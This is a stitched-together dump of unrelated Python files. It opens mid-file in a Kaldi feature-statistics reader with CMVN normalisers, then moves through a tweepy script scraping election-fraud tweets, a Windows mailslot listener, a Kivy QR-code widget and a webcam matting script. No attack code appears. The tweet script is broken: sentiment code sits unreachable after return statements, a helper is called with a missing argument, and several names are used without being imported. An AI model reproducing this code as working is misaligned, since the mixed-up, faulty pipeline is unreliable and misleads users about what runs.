os.path.isfile(fileName), f"No such file: {fileName} ." assert spk is None or isinstance(spk,str), f"<spk> should be a string." result = None with open(fileName, 'rb') as fp: while True: # read utterance ID utt = '' while True: char = fp.read(1).decode() if (char == '') or (char == ' '):break utt += char utt = utt.strip() if utt == '': if fp.read() == b'': break else: raise Exception("Miss utterance ID before utterance in stats file.") # read binary symbol binarySymbol = fp.read(2).decode() if binarySymbol == '\0B': sizeSymbol = fp.read(1).decode() if sizeSymbol not in ["C","F","D"]: raise Exception(f"Missed format flag. This might not be a kaldi stats file.") dataType = sizeSymbol + fp.read(2).decode() if dataType == 'CM ': raise Exception("Unsupported to read compressed binary kaldi matrix data.") elif dataType == 'FM ': sampleSize = 4 dtype = "float32" elif dataType == 'DM ': sampleSize = 8 dtype = "float64" else: raise Exception(f"Expected data type FM -> float32, DM -> float64 but got {dataType}.") s1,rows,s2,cols = np.frombuffer(fp.read(10),dtype="int8,int32,int8,int32",count=1)[0] rows = int(rows) cols = int(cols) bufSize = rows * cols * sampleSize buf = fp.read(bufSize) else: raise Exception("Miss binary symbol before utterance in stats file.") data = np.frombuffer(buf,dtype=dtype).reshape([rows,cols]) if spk == utt: return data elif spk is None: if result is None: result = data.copy() else: result += data if spk is not None: raise Exception(f"No such utterance: {spk}.") else: return result def spk_to_utt(spk,spk2utt): ''' Args: <spk>: a string. <spk2utt>: spk2utt file. Return: a list of utterance IDs. ''' assert isinstance(spk,str) and len(spk.strip()) > 0 assert os.path.isfile(spk2utt), f"No such file: {spk2utt}." with open(spk2utt,"r") as fr: lines = fr.readlines() for line in lines: line = line.strip() if line == "": continue line = line.split() if line[0] == spk: return line[1:] return [] def utt_to_spk(utt,utt2spk): ''' Args: <utt>: a string. <utt2spk>: spk2utt file. Return: a string. ''' assert isinstance(utt,str) and len(utt.strip()) > 0 assert os.path.isfile(utt2spk), f"No such file: {utt2spk}." with open(utt2spk,"r") as fr: lines = fr.readlines() for line in lines: line = line.strip() if line == "": continue line = line.split() assert len(line) == 2 if line[0] == utt: return line[1] return None '''A base class for CMV normalizer''' class CMVNormalizer(ExKaldiRTBase): ''' CMVN used to be embeded in FeatureProcesser. Note that this is not Component. ''' def __init__(self,offset=-1,name=None): ''' Args: _offset_: (int) The dim. offset. _name_: (str) Name. ''' super().__init__(name=name) assert isinstance(offset,int) and offset >= -1 self.__offset = offset @property def offset(self): return self.__offset @property def dim(self): raise Exception(f"{self.name}: Please implement the .dim function.") class ConstantCMVNormalizer(CMVNormalizer): ''' Constant CMVN. ''' def __init__(self,gStats,std=False,offset=-1,name=None): ''' Args: _gStats_: (2-d array) Previous statistics. A numpy array with shape: (2 or 1, feature dim + 1). _std_: (bool) If True, do variance normalization. _offset_: (int). _name_: (str). ''' super().__init__(offset=offset,name=name) assert isinstance(std,bool), "<std> must be a bool value." self.__std = std self.redirect(gStats) def redirect(self,gStats): ''' Redirect the global statistics. Args: _gStats_: (2-d array) Previous statistics. A numpy array with shape: (2 or 1, feature dim + 1). ''' assert isinstance(gStats,np.ndarray), f"{self.name}: <gStats> of .resirect method must be a NumPy array." if len(gStats.shape) == 1: assert self.__std is False self.__cmv = gStats[:-1][None,:] self.__counter = int(gStats[-1]) else: assert len(gStats.shape) == 2 self.__cmv = gStats[:,:-1] self.__counter = int(gStats[0,-1]) assert self.__counter > 0 self.__cmvn = self.__cmv / self.__counter self.__dim = self.__cmvn.shape[1] @property def dim(self): ''' Get the cmvn dim. ''' return self.__dim def apply(self,frames): ''' Apply CMVN to feature. If the dim of feature > the dim of cmvn, you can set offet to set cmvn range. ''' if len(frames) == 0: return frames # if did not set the offet if self.offset == -1: assert frames.shape[1] == self.dim, f"{self.name}: Feature dim dose not match CMVN dim, {frames.shape[1]} != {self.dim}. " return ((frames - self.__cmvn[0])/self.__cmvn[1]) if self.__std else (frames - self.__cmvn[0]) # if had offset else: endIndex = self.offset + self.dim assert endIndex <= frames.shape[1], f"{self.name}: cmvn dim range over flow, feature dim: {frames.shape[1]}, cmvn dim: {endIndex}." sliceFrames = frames[:,self.offset:endIndex] result = ((sliceFrames - self.__cmvn[0])/self.__cmvn[1]) if self.__std else (sliceFrames - self.__cmvn[0]) frames[:,self.offset:endIndex] = result return frames class FrameSlideCMVNormalizer(CMVNormalizer): ''' Classic frame sliding CMVN. ''' def __init__(self,width=600,std=False,freezedCmvn=None,gStats=None,offset=-1,dim=None,name=None): super().__init__(offset=offset,name=name) assert isinstance(width,int) and width > 0, f"{self.name}: <width> should be a reasonable value." assert isinstance(std,bool), f"{self.name}: <std> should be a bool value." self.__width = width self.__std = std self.__dim = None self.__freezedCmvn = None self.__globalCMV = None # If has freezed cmvn if freezedCmvn is not None: assert isinstance(freezedCmvn,np.ndarray) and len(freezedCmvn) == 2, \ "<freezedCMVN> should be a 2-d NumPy array." self.__freezedCmvn = freezedCmvn self.__dim = freezedCmvn.shape[1] # If has global CMVN elif gStats is not None: assert isinstance(gStats,np.ndarray) and len(gStats) == 2, \ "<globalCMV> should be a 2-d NumPy array." self.__globalCMV = gStats[:,0:-1] self.__globalCounter = gStats[0,-1] self.__dim = gStats.shape[1] - 1 if self.__std: self.__frameBuffer = np.zeros([2,self.__width, self.__dim],dtype="float32") self.__cmv = np.zeros([2, self.__dim],dtype="float32") else: self.__frameBuffer = np.zeros([1,self.__width, self.__dim],dtype="float32") self.__cmv = np.zeros([1, self.__dim],dtype="float32") else: if dim is not None: assert isinstance(dim,int) and dim > 0 self.__dim = dim if self.__std: self.__frameBuffer = np.zeros([2,self.__width, self.__dim],dtype="float32") self.__cmv = np.zeros([2, self.__dim],dtype="float32") else: self.__frameBuffer = np.zeros([1,self.__width, self.__dim],dtype="float32") self.__cmv = np.zeros([1, self.__dim],dtype="float32") else: self.__cmv = None self.__frameBuffer = None # Other configs self.__counter = 0 self.__ringIndex = 0 @property def dim(self): assert self.__dim is not None return self.__dim def freeze(self): '''Freeze the CMVN statistics.''' if self.__freezedCmvn is None: self.__freezedCmvn = self.get_cmvn() def apply(self,frames): '''Apply the cmvn to frames.''' assert isinstance(frames,np.ndarray) if len(frames) == 0: return frames assert len(frames.shape) == 2 fdim = frames.shape[1] if self.offset == -1: # Check the feature dimmension if self.__dim is not None: assert fdim == self.dim # If has freezed cmvn if self.__freezedCmvn is not None: return ((frames-self.__freezedCmvn[0])/self.__freezedCmvn[1]) if self.__std else (frames-self.__freezedCmvn[0]) else: return self.__apply(frames) else: # Check the feature dimmension if self.__dim is not None: assert self.offset + self.__dim <= fdim endIndex = self.offset + self.__dim else: self.__dim = fdim - self.offset endIndex = fdim # Compute sliceFrames = frames[ :, self.offset:endIndex ] result = self.__apply(sliceFrames) frames[ :, self.offset:endIndex ] = result return frames @property def counter(self): return self.__counter @property def width(self): return self.__width def __apply(self,frames): for ID in range(len(frames)): self.cache_frame(frames[ID]) cmvn = self.get_cmvn() if self.__std: frames[ID] = (frames[ID]- cmvn[0])/cmvn[1] else: frames[ID] = (frames[ID]- cmvn[0]) return frames def cache_frame(self,frame): '''Cache frame''' if self.__frameBuffer is None: dim = len(frame) if self.__std: self.__frameBuffer = np.zeros([2,self.__width,dim],dtype="float32") self.__cmv = np.zeros([2,dim],dtype="float32") frame2 = frame ** 2 self.__frameBuffer[0,0,:] = frame self.__frameBuffer[1,0,:] = frame self.__cmv[0,:] = frame self.__cmv[1,:] = frame2 else: self.__frameBuffer = np.zeros([1,self.__width,dim],dtype="float32") self.__cmv = np.zeros([1,dim],dtype="float32") self.__frameBuffer[0,0,:] = frame self.__cmv[0,:] = frame self.__counter = 1 self.__ringIndex = 1 self.__dim = dim else: self.__cmv[0] = self.__cmv[0] - self.__frameBuffer[0,self.__ringIndex,:] + frame self.__frameBuffer[0,self.__ringIndex,:] = frame if self.__std: frame2 = frame ** 2 self.__cmv[1] = self.__cmv[1] - self.__frameBuffer[1,self.__ringIndex,:] + frame2 self.__frameBuffer[1,self.__ringIndex,:] = frame2 self.__ringIndex = (self.__ringIndex + 1)%self.__width self.__counter += 1 def get_cmvn(self): '''Get the current statistics''' if self.__counter >= self.__width: return self.__cmv/self.__width else: if self.__globalCMV is None: return self.__cmv/self.__counter else: missed = self.__width - self.__counter if self.__globalCounter >= missed: return (self.__cmv + self.__globalCMV * missed/self.__globalCounter)/self.__width else: return (self.__cmv + self.__globalCMV) / (self.__counter + self.__globalCounter) def set_stats(self,stats): assert isinstance(stats,np.ndarray) and len(stats.shape) == 2 self.__cmv = stats[:,0:-1] self.__counter = stats[0,-1] def set_freezed_cmvn(self,cmvn): assert isinstance(cmvn,np.ndarray) and len(cmvn.shape) == 2 self.__freezedCmvn = cmvn def get_stats(self): '''Write the statistics into file.''' num = self.__counter if self.__counter < self.__width else self.__width return np.append(self.__cmv,[[num,],[0]],axis=1) def get_freezed_cmvn(self): '''Write the freezed cmvn into file.''' return self.__freezedCmvn ############################################### # 3. Some functions for raw feature processing ############################################### class MatrixFeatureProcessor(Component): ''' The feature processor. ''' def __init__(self,delta=0,deltaWindow=2,spliceLeft=0,spliceRight=0, cmvNormalizer=None,lda=None,oKey="data",name=None): ''' Args: _delta_: (int) The order of delta. _deltaWindow_: (int) The window size of delta. _spliceLeft_: (int) Left context to splice. _spliceRight_: (int) Right context to splice. _cmvNormalizer_: (CMVNormalizer). _lda_: (str, 2-d array) LDA file path or 2-d np.ndarray. _name_: (str) Name. ''' super().__init__(oKey=oKey,name=name) assert isinstance(delta,int) and delta >= 0 assert isinstance(deltaWindow,int) and deltaWindow > 0 assert isinstance(spliceLeft,int) and spliceLeft >= 0 assert isinstance(spliceRight,int) and spliceRight >= 0 self.__delta = delta self.__deltaWindow = deltaWindow self.__context = ContextManager(spliceLeft,spliceRight) # Config LDA if lda is not None: if isinstance(lda,str): self.__ldaMat = load_lda_matrix(lda) else: assert isinstance(lda,np.ndarray) and len(lda.shape) == 2 self.__ldaMat = lda else: self.__ldaMat = None # Config CMVNs self.__cmvns = [] if cmvNormalizer is not None: self.set_cmvn(cmvNormalizer) def set_cmvn(self,cmvn,index=-1): assert isinstance(cmvn,CMVNormalizer),f"{self.name}: <cmvNormalizer> mush be a CMVNormalizer object but got: {type(cmvn).__name__}." if index == -1: self.__cmvns.append( cmvn ) else: assert isinstance(index,int) and 0 <= index < len(self.__cmvns) self.__cmvns[index] = cmvn def __transform_function(self,feats): ## do the cmvn firstly. ## We will save the new cmvn feature instead of raw feature buffer. if len(self.__cmvns) > 0: for cmvn in self.__cmvns: feats = cmvn.apply( feats ) ## then compute context #print( "debug 1:", feats.shape ) feats = self.__context.wrap( feats ) if feats is None: return None #print( "debug 2:", feats.shape ) # Add delta if self.__delta > 0: feats = add_deltas(feats,order=self.__delta,window=self.__deltaWindow) # Splice if self.__context.left > 0 or self.__context.right != 0: feats = splice_feats(feats,left=self.__context.left,right=self.__context.right) # Use LDA transform if self.__ldaMat is not None: feats = feats.dot(self.__ldaMat) feats = self.__context.strip( feats ) return feats def core_loop(self): lastPacket = None while True: action = self.decide_action() if action is True: packet = self.get_packet() if not packet.is_empty(): iKey = packet.mainKey if self.iKey is None else self.iKey newMat = self.__transform_function( packet[iKey] ) if newMat is None: lastPacket = packet else: if lastPacket is None: packet.add( self.oKey[0], newMat, asMainKey=True ) self.put_packet( packet ) else: lastPacket.add( self.oKey[0], newMat, asMainKey=True ) self.put_packet( lastPacket ) lastPacket = packet if is_endpoint(packet): if lastPacket is not None: iKey = lastPacket.mainKey if self.iKey is None else self.iKey newMat = self.__transform_function( np.zeros_like(lastPacket[iKey]) ) lastPacket.add( self.oKey[0], newMat, asMainKey=True ) self.put_packet( lastPacket ) if packet.is_empty(): self.put_packet( packet ) else: break
twitter_playground.py
# from twitter import Twitter, OAuth, Hashtag, List import json import re from pprint import pprint import os import pandas import tweepy as tw import pandas as pd from multiprocessing import Pool, Process, Lock, Queue import time import csv from queue import Queue CONSUMER_KEY = "" CONSUMER_SECRET = "" ACCESS_TOKEN = "" ACCESS_TOKEN_SECRET = "" OUTPUT = 'tweet_threads.csv' auth = tw.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET) auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET) api = tw.API(auth, wait_on_rate_limit=True) search_words = "election+fraud -filter:retweets" new_q = "mail+in+ballots" date_since = "2020-11-05" new_search = new_q + " -filter:retweets" fraud_search = "voter+fraud -filter:retweets" def rem_hashtags(text, hashtag): processed_text = re.sub(r"#{ht}".format(ht=hashtag), "", text) processed_text = " ".join(processed_text.split()) return processed_text def remove_users(text): processed_text = re.sub(r'@\w+ ?',"",text) processed_text = " ".join(processed_text.split()) return processed_text def remove_links(text): processed_text = re.sub(r"(?:\@|http?\://|https?\://|www)\S+", "", text) processed_text = " ".join(processed_text.split()) return processed_text def remove_punct(text): punctuations = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' text = "".join([char for char in text if char not in punctuations]) text = re.sub('[0-9]+', '', text) return text def lowercase_word(text): return "".join([char.lower() for char in text]) def clean_up_tweets(csv_file): data = pd.read_csv(csv_file, header = None, encoding='utf-8', names = ['Time', 'Tweets', 'Userame', 'Location']) data['Tweets'] = data['Tweets'].apply(lambda x:rem_hashtags(x)) data['Tweets'] = data['Tweets'].apply(lambda x:remove_users(x)) data['Tweets'] = data['Tweets'].apply(lambda x:remove_links(x)) data['Tweets'] = data['Tweets'].apply(lambda x: remove_punct(x)) data['Tweets'] = data['Tweets'].apply(lambda x: lowercase_word(x)) return " ".join(iter(data['Tweets'])) def get_tweet_sentiment(data): ''' input: cleaned tweet data ex. clean_up_tweets(csvfile) output: sentiment values Do sentiment analysis on the input tweets. ''' if data > 0: return 'positive' elif data == 0: return 'neutral' else: return 'negative' tweets = [TextBlob(tweet) for tweet in data['Tweets']] data['polarity'] = [b.sentiment.polarity for b in tweets] data['subjectivity'] = [b.sentiment.subjectivity for b in tweets] data['sentiment'] = data['polarity'].apply(get_tweet_sentiment) return data['sentiment'].value_counts() def make_wordcloud(data): ''' input: cleaned tweet data ex. clean_up_tweets(csvfile) output: image file of wordcloud Create a wordcloud based on the input tweets. ''' fig, ax = plt.subplots(1, 1, figsize = (30,30)) # Create and generate a word cloud image: wordcloud_ALL = WordCloud(max_font_size=50, max_words=100, background_color="white").generate(data) # Display the generated image: ax.imshow(wordcloud_ALL, interpolation='bilinear') ax.axis('off') class Twittermine(object): """docstring for Twittermine.""" def __init__(self, output=OUTPUT): super(Twittermine, self).__init__() self.queue = Queue() self.output = output self.uid = 0 self.print_lock = Lock() self.write_lock = Lock() self.uid_lock = Lock() self.process_pool = [] self.collect_pool = [] self.found_ = Queue() self.queries = Queue() def fetch_tweets(self, query, item_count=100): return tw.Cursor(api.search, q=query, lang="en", since=date_since).items(item_count) def fetch_user_loc(self, query, item_count=100): tweets = tw.Cursor(api.search, q=query, lang="en", since=date_since).items(item_count) return [[tweet.user.screen_name, tweet.user.location] for tweet in tweets] def make_tweet_pandas(self, tweet_data: list, cols: list): return pd.DataFrame(data=tweet_data, columns=cols) def run(self, collect_threads=3, process_threads=3): ''' Starts threads to collect tweets and threads to read them. ''' print('Starting collection...') self.manage_collect(collect_threads) time.sleep(120) print('Starting processing...') self.manage_process(process_threads) for p in self.collect_pool: p.join() if not self.queue.empty(): # If there's still articles to process, restart processing self.manage_process(process_threads) for p in self.process_pool: p.join() def manage_process(self, process_threads): ''' Start given number of threads to multi-process tweets. ''' while not self.queue.empty(): for _ in range(process_threads): p = Process(target=self.process_tweets, args=()) p.start() self.process_pool.append(p) self.print_lock.acquire() print('No tweets found. Ending processing.') self.print_lock.release() def manage_collect(self, collect_threads): ''' Start a given number of threads to multi-process collection. ''' for _ in range(collect_threads): p = Process(target=self.collect_tweets, args=()) p.start() self.collect_pool.append(p) def collect_tweets(self): ''' Collects tweets from sites, downloads, and adds them to queue for processing. ''' while not self.queries.empty(): search_word, items = self.queries.get() tweets = self.fetch_tweets(search_word, item_count=items) if not tweets: self.found_.put((search_word, items)) self.print_lock.acquire() print('Error collecting tweets; moving to back of queue.') self.print_lock.release() else: self.queue.put(tweets) def process_tweets(self): ''' Processes articles in queue. ''' tweetlist = self.queue.get() print("Tweets successfully found in queue!") try: row = self.read_tweets(tweetlist) self.write_to_file(row, self.output) info = clean_up_tweets(self.output) make_wordcloud(info) except Exception as e: print('Error downloading or reading tweet.') print(e) def write_to_file(self, row, output, method='a'): ''' Writes result to file. ''' if not os.path.isfile(output) and method == 'a': self.write_to_file(['Time', 'Tweets', 'Userame', 'Location'], output, 'w') self.write_lock.acquire() with open(output, method) as f: writer = csv.writer(f) writer.writerow(row) self.write_lock.release() def get_uid(self): ''' Gets a uid for the tweet. ''' self.uid_lock.acquire() uid = self.uid self.uid += 1 self.uid_lock.release() return uid def read_tweets(self, tweets): ''' Parses tweets. Returns row of information for csv ingestion. ''' print(f"Outputting tweets for search thread") return [[tweet.created_at, tweet.text, tweet.user.screen_name, tweet.user.location] for tweet in tweets] def output_data_as_df(self, all_data): return self.make_tweet_pandas( all_data, cols=['Time', 'Tweets', 'Userame', 'Location'] ) tweeter = Twittermine() print(tweeter.run())
mailslot_listener.pyw
-*- coding: utf-8 -*- import os, sys import marshal import threading import time import pywintypes import winerror import win32gui import win32con import win32api from winsys import core, exceptions, ipc, utils, dialogs WINERROR_MAP = { winerror.ERROR_INVALID_WINDOW_HANDLE : exceptions.x_invalid_handle, } wrapped = exceptions.wrapper(WINERROR_MAP) class MainWindow: def __init__(self, title): wc = win32gui.WNDCLASS() hinst = wc.hInstance = win32api.GetModuleHandle(None) wc.lpszClassName = "Log output window" wc.lpfnWndProc = self._wndproc_ wc.hbrBackground = win32con.COLOR_WINDOW wc.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW) wc.style = win32con.CS_OWNDC | win32con.CS_HREDRAW | win32con.CS_VREDRAW self.hEdit = None self.hwnd = win32gui.CreateWindowEx( win32con.WS_EX_CLIENTEDGE | win32con.WS_EX_APPWINDOW, win32gui.RegisterClass(wc), title, win32con.WS_OVERLAPPEDWINDOW, 0, 0, win32con.CW_USEDEFAULT, win32con.CW_USEDEFAULT, 0, 0, hinst, None ) self.hEdit = win32gui.CreateWindow( "EDIT", None, win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_VSCROLL | win32con.ES_LEFT | win32con.ES_MULTILINE | win32con.ES_AUTOVSCROLL, 0, 0, 0, 0, self.hwnd, 0, hinst, None ) win32gui.ShowWindow(self.hwnd, win32con.SW_SHOWNORMAL) def _wndproc_(self, hwnd, msg, wparam, lparam): if msg == win32con.WM_SIZE: win32gui.MoveWindow(self.hEdit, 0, 0, win32api.LOWORD(lparam), win32api.HIWORD(lparam), True) elif msg == win32con.WM_DESTROY: win32gui.PostQuitMessage(0) elif msg == win32con.WM_SETTEXT: self.output_message(win32gui.PyGetString(lparam)) else: return win32gui.DefWindowProc(hwnd, msg, wparam, lparam) def output_message(self, string): string = string.replace("\r\n", "\n").replace("\n", "\r\n") hwnd = self.hEdit win32gui.SendMessage(hwnd, win32con.EM_SETREADONLY, 0, 0) win32gui.SendMessage(hwnd, win32con.WM_SETREDRAW, 0, 0) win32gui.SendMessage(hwnd, win32con.EM_REPLACESEL, 0, utils.string_as_pointer(string)) win32gui.SendMessage(hwnd, win32con.EM_LINESCROLL, 0, win32gui.SendMessage(hwnd, win32con.EM_GETLINECOUNT, 0, 0)) win32gui.SendMessage(hwnd, win32con.WM_SETREDRAW, 1, 0) win32gui.SendMessage(hwnd, win32con.EM_SETREADONLY, 1, 0) def handle_mailslot(hwnd, mailslot_name): mailslot = ipc.mailslot(mailslot_name) while True: text = marshal.loads(mailslot.get()) if text is None: try: wrapped(win32gui.PostMessage, hwnd, win32con.WM_CLOSE, 0, 0) except exceptions.x_invalid_handle: pass break else: win32gui.SendMessage(hwnd, win32con.WM_SETTEXT, 0, utils.string_as_pointer(text + "\n")) def main(mailslot_name): window = MainWindow("Listening to mailslot %s" % mailslot_name) threading.Thread(target=handle_mailslot, args=(window.hwnd, mailslot_name)).start() win32gui.PumpMessages() try: ipc.Mailslot(mailslot_name).put(marshal.dumps(None)) except exceptions.x_not_found: pass if __name__=='__main__': if len(sys.argv) >= 2: mailslot_name = sys.argv[1] else: results = dialogs.dialog("Mailslot name", ("Mailslot name", "\\\\.\\mailslot\\", None)) if results: mailslot_name = results[0] else: sys.exit() main(mailslot_name)
qrcode_widget.py
""" Kivy Widget that accepts data and displays qrcode. """ import os from functools import partial from threading import Thread import qrcode from kivy.clock import Clock from kivy.graphics.texture import Texture from kivy.lang import Builder from kivy.properties import (BooleanProperty, ListProperty, NumericProperty, StringProperty) from kivy.uix.floatlayout import FloatLayout class QRCodeWidget(FloatLayout): show_border = BooleanProperty(True) """Whether to show border around the widget. :data:`show_border` is a :class:`~kivy.properties.BooleanProperty`, defaulting to `True`. """ data = StringProperty(None, allow_none=True) """Data using which the qrcode is generated. :data:`data` is a :class:`~kivy.properties.StringProperty`, defaulting to `None`. """ error_correction = NumericProperty(qrcode.constants.ERROR_CORRECT_L) """The error correction level for the qrcode. :data:`error_correction` is a constant in :module:`~qrcode.constants`, defaulting to `qrcode.constants.ERROR_CORRECT_L`. """ background_color = ListProperty((1, 1, 1, 1)) """Background color of the background of the widget to be displayed behind the qrcode. :data:`background_color` is a :class:`~kivy.properties.ListProperty`, defaulting to `(1, 1, 1, 1)`. """ loading_image = StringProperty('data/images/image-loading.gif') """Intermediate image to be displayed while the widget ios being loaded. :data:`loading_image` is a :class:`~kivy.properties.StringProperty`, defaulting to `'data/images/image-loading.gif'`. """ def __init__(self, **kwargs): module_dir = os.path.dirname(os.path.abspath(__file__)) Builder.load_file(os.path.join(module_dir, "qrcode_widget.kv")) super().__init__(**kwargs) self.addr = None self.qr = None self._qrtexture = None def on_data(self, instance, value): if not (self.canvas or value): return img = self.ids.get('qrimage', None) if not img: # if texture hasn't yet been created delay the texture updating Clock.schedule_once(lambda dt: self.on_data(instance, value)) return img.anim_delay = .25 img.source = self.loading_image Thread(target=partial(self.generate_qr, value)).start() def on_error_correction(self, instance, value): self.update_qr() def generate_qr(self, value): self.set_addr(value) self.update_qr() def set_addr(self, addr): if self.addr == addr: return MinSize = 210 if len(addr) < 128 else 500 self.setMinimumSize((MinSize, MinSize)) self.addr = addr self.qr = None def update_qr(self): if not self.addr and self.qr: return QRCode = qrcode.QRCode addr = self.addr try: self.qr = qr = QRCode( version=None, error_correction=self.error_correction, box_size=10, border=0, ) qr.add_data(addr) qr.make(fit=True) except Exception as e: print(e) self.qr = None self.update_texture() def setMinimumSize(self, size): # currently unused, do we need this? self._texture_size = size def _create_texture(self, k, dt): self._qrtexture = texture = Texture.create(size=(k, k), colorfmt='rgb') # don't interpolate texture texture.min_filter = 'nearest' texture.mag_filter = 'nearest' def update_texture(self): if not self.addr: return matrix = self.qr.get_matrix() k = len(matrix) # create the texture in main UI thread otherwise # this will lead to memory corruption Clock.schedule_once(partial(self._create_texture, k), -1) cr, cg, cb, ca = self.background_color[:] cr, cg, cb = int(cr*255), int(cg*255), int(cb*255) # used bytearray for python 3.5 eliminates need for btext buff = bytearray() for r in range(k): for c in range(k): buff.extend([0, 0, 0] if matrix[r][c] else [cr, cg, cb]) # then blit the buffer # join not necessary when using a byte array # buff =''.join(map(chr, buff)) # update texture in UI thread. Clock.schedule_once(lambda dt: self._upd_texture(buff)) def _upd_texture(self, buff): texture = self._qrtexture if not texture: # if texture hasn't yet been created delay the texture updating Clock.schedule_once(lambda dt: self._upd_texture(buff)) return texture.blit_buffer(buff, colorfmt='rgb', bufferfmt='ubyte') texture.flip_vertical() img = self.ids.qrimage img.anim_delay = -1 img.texture = texture img.canvas.ask_update() if __name__ == '__main__': import sys from kivy.app import runTouchApp data = str(sys.argv[1:]) runTouchApp(QRCodeWidget(data=data))
inference_webcam.py
""" Inference on webcams: Use a model on webcam input. Once launched, the script is in background collection mode. Press B to toggle between background capture mode and matting mode. The frame shown when B is pressed is used as background for matting. Press Q to exit. Example: python inference_webcam.py \ --model-type mattingrefine \ --model-backbone resnet50 \ --backend pytorch \ --model-checkpoint "PATH_TO_CHECKPOINT" \ --resolution 1280 720 \ --video_device_id 0 \ """ import argparse, os, shutil, time import cv2 import torch from torch import nn from torch.utils.data import DataLoader from torchvision.transforms import Compose, ToTensor, Resize from torchvision.transforms.functional import to_pil_image from threading import Thread, Lock from tqdm import tqdm from PIL import Image from dataset import VideoDataset from model import MattingBase, MattingRefine from torchvision.transforms.functional import to_tensor # --------------- Arguments --------------- parser = argparse.ArgumentParser(description='Inference from web-cam') parser.add_argument('--model-type', type=str, required=True, choices=['mattingbase', 'mattingrefine']) parser.add_argument('--model-backbone', type=str, required=True, choices=['resnet101', 'resnet50', 'mobilenetv2']) parser.add_argument('--model-backbone-scale', type=float, default=0.25) parser.add_argument('--model-checkpoint', type=str, required=True) parser.add_argument('--model-refine-mode', type=str, default='sampling', choices=['full', 'sampling', 'thresholding']) parser.add_argument('--model-refine-sample-pixels', type=int, default=80_000) parser.add_argument('--model-refine-threshold', type=float, default=0.1) parser.add_argument('--hide-fps', action='store_true') parser.add_argument('--resolution', type=int, nargs=2, metavar=('width', 'height'), default=(1280, 720)) parser.add_argument('--precision', type=str, default='float32', choices=['float32', 'float16']) parser.add_argument('--backend', type=str, default='pytorch', choices=['pytorch', 'torchscript']) parser.add_argument('--video_device_id', type=int, default=0) args = parser.parse_args() # ----------- Utility classes ------------- # A wrapper that reads data from cv2.VideoCapture in its own thread to optimize. # Use .read() in a tight loop to get the newest frame class Camera: def __init__(self, device_id=0, width=1280, height=720): self.capture = cv2.VideoCapture(device_id) self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height) self.width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH)) self.height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT)) # self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 2) self.success_reading, self.frame = self.capture.read() self.read_lock = Lock() self.thread = Thread(target=self.__update, args=()) self.thread.daemon = True self.thread.start() def __update(self): while self.success_reading: grabbed, frame = self.capture.read() with self.read_lock: self.success_reading = grabbed self.frame = frame def read(self): with self.read_lock: frame = self.frame.copy() return frame def __exit__(self, exec_type, exc_value, traceback): self.capture.release() # An FPS tracker that computes exponentialy moving average FPS class FPSTracker: def __init__(self, ratio=0.5): self._last_tick = None self._avg_fps = None self.ratio = ratio def tick(self): if self._last_tick is None: self._last_tick = time.time() return None t_new = time.time() fps_sample = 1.0 / (t_new - self._last_tick) self._avg_fps = self.ratio * fps_sample + (1 - self.ratio) * self._avg_fps if self._avg_fps is not None else fps_sample self._last_tick = t_new return self.get() def get(self): return self._avg_fps # Wrapper for playing a stream with cv2.imshow(). It can accept an image and return keypress info for basic interactivity. # It also tracks FPS and optionally overlays info onto the stream. class Displayer: def __init__(self, title, width=None, height=None, show_info=True): self.title, self.width, self.height = title, width, height self.show_info = show_info self.fps_tracker = FPSTracker() cv2.namedWindow(self.title, cv2.WINDOW_NORMAL) cv2.setWindowProperty(self.title, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN) #fullscreen if width is not None and height is not None: cv2.resizeWindow(self.title, width, height) # Update the currently showing frame and return key press char code def step(self, image): fps_estimate = self.fps_tracker.tick() if self.show_info and fps_estimate is not None: message = f"{int(fps_estimate)} fps | {self.width}x{self.height}" cv2.putText(image, message, (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0)) cv2.imshow(self.title, image) return cv2.waitKey(1) & 0xFF # --------------- Main --------------- if args.precision == 'float32': precision = torch.float32 else: precision = torch.float16 # Load model if args.backend == 'torchscript': # Load torchscript model = torch.jit.load(args.model_checkpoint) model.backbone_scale = args.model_backbone_scale model.refine_mode = 'sampling' model.refine_sample_pixels = 80_000 model = model.to(torch.device('cuda')) else: # Load pytorch if args.model_type == 'mattingbase': model = MattingBase(args.model_backbone) if args.model_type == 'mattingrefine': model = MattingRefine( args.model_backbone, args.model_backbone_scale, args.model_refine_mode, args.model_refine_sample_pixels, args.model_refine_threshold) model = model.cuda().eval().to(device='cuda', dtype=precision) model.load_state_dict(torch.load(args.model_checkpoint), strict=False) width, height = args.resolution cam = Camera(width=width, height=height, device_id=args.video_device_id) dsp = Displayer('MattingV2', cam.width, cam.height, show_info=(not args.hide_fps)) def cv2_frame_to_cuda(frame): frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) output = to_tensor(frame).unsqueeze_(0).to(device='cuda', dtype=precision) #output = ToTensor()(Image.fromarray(frame)).unsqueeze_(0).cuda() return output with torch.no_grad(): while True: bgr = None bgr_green = torch.tensor([120/255, 255/255, 155/255], device='cuda').view(1, 3, 1, 1) while True: # grab bgr frame = cam.read() key = dsp.step(frame) if key == ord('b'): bgr = cv2_frame_to_cuda(cam.read()) break elif key == ord('q'): exit() while True: # matting frame = cam.read() src = cv2_frame_to_cuda(frame) pha, fgr = model(src, bgr)[:2] #res = pha * fgr + (1 - pha) * torch.ones_like(fgr) res = fgr * pha + bgr_green * (1 - pha) res = res.mul(255).byte().cpu().permute(0, 2, 3, 1).numpy()[0] res = cv2.cvtColor(res, cv2.COLOR_RGB2BGR) key = dsp.step(res) if key == ord('b'): break elif key == ord('q'): exit()
run_py_tests.py
